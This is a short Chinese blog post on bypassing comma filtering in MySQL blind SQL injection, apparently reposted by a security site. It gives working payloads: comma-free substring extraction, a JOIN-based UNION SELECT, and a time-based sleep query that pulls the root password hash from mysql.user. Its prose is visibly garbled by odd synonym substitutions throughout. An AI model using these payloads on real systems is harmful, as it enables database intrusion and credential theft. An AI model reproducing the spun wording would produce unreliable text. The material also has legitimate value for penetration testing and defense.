0X00 后盾
审计cms创举一个何等的情况:
Default| 12 | $l_id = get('arr','l_id');$ids = explode(',',$l_id); |
拼接post中数组的求告,尔后再用逗号吞并,开首带入了SQL查问。
于是就碰到了不能操作逗号的情况。
默认
display_error=off
无显错,只能盲注。
0X01希图治理:
首要希图substring的逗号标题问题。
参考文档:
http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_substring
| 1234567 | select * from table1 where id =1 and exists (select * from table2 where ord(substring(username from 1 for 1)=97); 127' UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)# select case when substring((select password from mysql.user where user='root') from 1 for 1)='e' then sleep(5) else 0 end # substring((select password from mysql.user where user='root') from -1)='e' |
以上例句请按照大家的情况而定。
91ri.org注:小编近期在实战浸透进程中也碰到了异样的场景,按照这篇文章,91RI团队的小搭档写了一个注入脚本,成功失掉了想要的消息。所以这里将这个tips给本成分享,渴想本身能学到东西:)
【via@xiaoL】
